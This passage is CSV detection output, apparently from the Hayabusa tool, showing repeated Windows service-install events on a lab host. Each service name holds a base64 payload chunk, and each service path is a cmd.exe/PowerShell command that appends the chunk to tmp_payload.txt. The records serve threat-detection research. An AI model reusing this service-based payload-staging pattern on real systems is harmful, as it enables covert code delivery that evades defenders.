deployed via service - Tchopper.evtx" +2021-11-03 08:20:08.810 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: UmV0dXJuLURyb3BEb3dufSkNCiAgICAgICAgJGZvcm0uQ29udHJvbHMuQWRkKCRCdXR0b24pDQoNCiAgICAgICAgJERyb3BEb3duLlNlbGVjdGVkSW5kZXggPSAgMA0KICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:08.810 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UmV0dXJuLURyb3BEb3dufSkNCiAgICAgICAgJGZvcm0uQ29udHJvbHMuQWRkKCRCdXR0b24pDQoNCiAgICAgICAgJERyb3BEb3duLlNlbGVjdGVkSW5kZXggPSAgMA0KICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:08.810 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UmV0dXJuLURyb3BEb3dufSkNCiAgICAgICAgJGZvcm0uQ29udHJvbHMuQWRkKCRCdXR0b24pDQoNCiAgICAgICAgJERyb3BEb3duLlNlbGVjdGVkSW5kZXggPSAgMA0KICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:10.268 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgJEZvcm0uQWRkX1Nob3duKHskRm9ybS5BY3RpdmF0ZSgpfSkNCiAgICAgICAgW3ZvaWRdICRGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgICRDaG9pY2UNCiAgICAgfQ0KICAgICANCiAgICBj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:10.268 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgJEZvcm0uQWRkX1Nob3duKHskRm9ybS5BY3RpdmF0ZSgpfSkNCiAgICAgICAgW3ZvaWRdICRGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgICRDaG9pY2UNCiAgICAgfQ0KICAgICANCiAgICBj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:10.268 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgJEZvcm0uQWRkX1Nob3duKHskRm9ybS5BY3RpdmF0ZSgpfSkNCiAgICAgICAgW3ZvaWRdICRGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgICRDaG9pY2UNCiAgICAgfQ0KICAgICANCiAgICBj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:11.713 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: YXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBnZW5lcmF0ZSBpbnB1dCBkcm9wIGRvd24iDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJEVycm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:11.713 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBnZW5lcmF0ZSBpbnB1dCBkcm9wIGRvd24iDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJEVycm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:11.713 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBnZW5lcmF0ZSBpbnB1dCBkcm9wIGRvd24iDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJEVycm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:13.158 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIkNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:13.158 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIkNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:13.158 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIkNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:14.614 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQoNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:14.614 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQoNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:14.614 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQoNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:16.115 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdldCB0aGUgbGlzdCBvZiBjb21wdXRlcnMgYmFzZWQgb24gdGhlIHVzZXJzIHNl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:16.115 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdldCB0aGUgbGlzdCBvZiBjb21wdXRlcnMgYmFzZWQgb24gdGhlIHVzZXJzIHNl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:16.115 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdldCB0aGUgbGlzdCBvZiBjb21wdXRlcnMgYmFzZWQgb24gdGhlIHVzZXJzIHNl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:17.556 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bGVjdGVkIGxpc3QgdHlwZQ0KDQojQHBhcmFtICRDb21wdXRlckxpc3RUeXBlICAgLT4gVGhlIHR5cGUgb2YgY29tcHV0ZXIgbGlzdCAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:17.556 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bGVjdGVkIGxpc3QgdHlwZQ0KDQojQHBhcmFtICRDb21wdXRlckxpc3RUeXBlICAgLT4gVGhlIHR5cGUgb2YgY29tcHV0ZXIgbGlzdCAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:17.556 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bGVjdGVkIGxpc3QgdHlwZQ0KDQojQHBhcmFtICRDb21wdXRlckxpc3RUeXBlICAgLT4gVGhlIHR5cGUgb2YgY29tcHV0ZXIgbGlzdCAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:19.033 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtQ29tcHV0ZXJMaXN0IHsgcGFyYW0oJENvbXB1dGVyTGlzdFR5 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:19.033 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtQ29tcHV0ZXJMaXN0IHsgcGFyYW0oJENvbXB1dGVyTGlzdFR5 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:19.033 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtQ29tcHV0ZXJMaXN0IHsgcGFyYW0oJENvbXB1dGVyTGlzdFR5 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:20.486 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cGUpDQoNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgJENvbXB1dGVyTGlzdCA9IEB7fTsNCg0KICAgICAgICBzd2l0Y2goJENvbXB1dGVyTGlzdFR5cGUpIHsNCg0KICAgICAgICAgICAgJERPTUFJTl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:20.486 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cGUpDQoNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgJENvbXB1dGVyTGlzdCA9IEB7fTsNCg0KICAgICAgICBzd2l0Y2goJENvbXB1dGVyTGlzdFR5cGUpIHsNCg0KICAgICAgICAgICAgJERPTUFJTl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:20.486 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cGUpDQoNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgJENvbXB1dGVyTGlzdCA9IEB7fTsNCg0KICAgICAgICBzd2l0Y2goJENvbXB1dGVyTGlzdFR5cGUpIHsNCg0KICAgICAgICAgICAgJERPTUFJTl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:22.080 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9PUFQgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaXN0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:22.080 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9PUFQgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaXN0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:22.080 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9PUFQgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaXN0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:23.533 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IEROU0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:23.533 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IEROU0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:23.533 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IEROU0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:24.976 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAkQ29tcHV0ZXJMaXN0ID0gJEdldEFEQ29tcHV0ZXJMaXN0LkROU0hvc3ROYW1lDQoNCiAgICAgICAgICAgICAgICBicmVhaw0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfSANCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:24.976 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAkQ29tcHV0ZXJMaXN0ID0gJEdldEFEQ29tcHV0ZXJMaXN0LkROU0hvc3ROYW1lDQoNCiAgICAgICAgICAgICAgICBicmVhaw0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfSANCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:24.976 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAkQ29tcHV0ZXJMaXN0ID0gJEdldEFEQ29tcHV0ZXJMaXN0LkROU0hvc3ROYW1lDQoNCiAgICAgICAgICAgICAgICBicmVhaw0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfSANCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:26.423 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgIA0KICAgICAgICAgICAgJEZJTEVfT1BUIHsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUZpbGVOYW1lICJEZXNrdG9wIiANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:26.423 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgIA0KICAgICAgICAgICAgJEZJTEVfT1BUIHsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUZpbGVOYW1lICJEZXNrdG9wIiANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 